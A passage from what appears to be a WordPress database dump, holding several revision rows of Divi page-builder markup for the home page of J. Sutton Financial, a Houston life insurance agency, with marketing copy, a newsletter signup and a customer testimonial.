--></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 18:56:50','2023-03-26 18:56:50','',138,'http://cmdev-site1.com/?p=497',0,'revision','',0),(496,1,'2023-03-26 18:54:34','2023-03-26 18:54:34','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||376px|||\" global_colors_info=\"{}\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_fullwidth_menu][et_pb_fullwidth_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" text_orientation=\"center\" module_alignment=\"center\" width=\"75%\" max_width=\"75%\"]<h1 style=\"color: #fff\"><!-- [et_pb_line_break_holder] -->J. Sutton Financial, an Independent Agency for American Income Life Insurance Company  <!-- [et_pb_line_break_holder] --></h1><!-- [et_pb_line_break_holder] --><p style=\"color: #fff\"><!-- [et_pb_line_break_holder] -->  J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.<!-- [et_pb_line_break_holder] --></p>[/et_pb_fullwidth_code][et_pb_fullwidth_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" text_orientation=\"center\" module_alignment=\"center\" width=\"75%\" max_width=\"75%\" border_radii=\"off|10px|||\"]<button><!-- [et_pb_line_break_holder] -->  Learn More<!-- [et_pb_line_break_holder] --></button>[/et_pb_fullwidth_code][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" button_one_text=\"Learn More\"][/dsm_button][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" button_one_text=\"Work for Us\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 18:54:34','2023-03-26 18:54:34','',138,'http://cmdev-site1.com/?p=496',0,'revision','',0),(502,1,'2023-03-26 19:17:53','2023-03-26 19:17:53','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" custom_margin=\"||9px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" active_link_color=\"#3f3f3f\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" sticky_enabled=\"0\" header_text_color=\"#FFFFFF\" before_new_line=\"off\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" sticky_enabled=\"0\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" button_two_text=\"Work for Us\" sticky_enabled=\"0\" button_alignment=\"center\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_bg_enable_color=\"on\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_bg_enable_color=\"on\" button_two_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" button_two_border_radius=\"14px\" button_two_border_width=\"0px\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Umbrella Roll in Icon\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_margin=\"||18px|||\" custom_padding=\"102px|||||\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-7px|||||\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 19:17:53','2023-03-26 19:17:53','',138,'http://cmdev-site1.com/?p=502',0,'revision','',0),(500,1,'2023-03-26 19:09:06','2023-03-26 19:09:06','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_menu _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" sticky_enabled=\"0\" header_text_color=\"#FFFFFF\" before_new_line=\"off\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" sticky_enabled=\"0\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" button_two_text=\"Work for Us\" sticky_enabled=\"0\" button_alignment=\"center\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_bg_enable_color=\"on\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_bg_enable_color=\"on\" button_two_border_color=\"RGBA(255,255,255,0)\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" 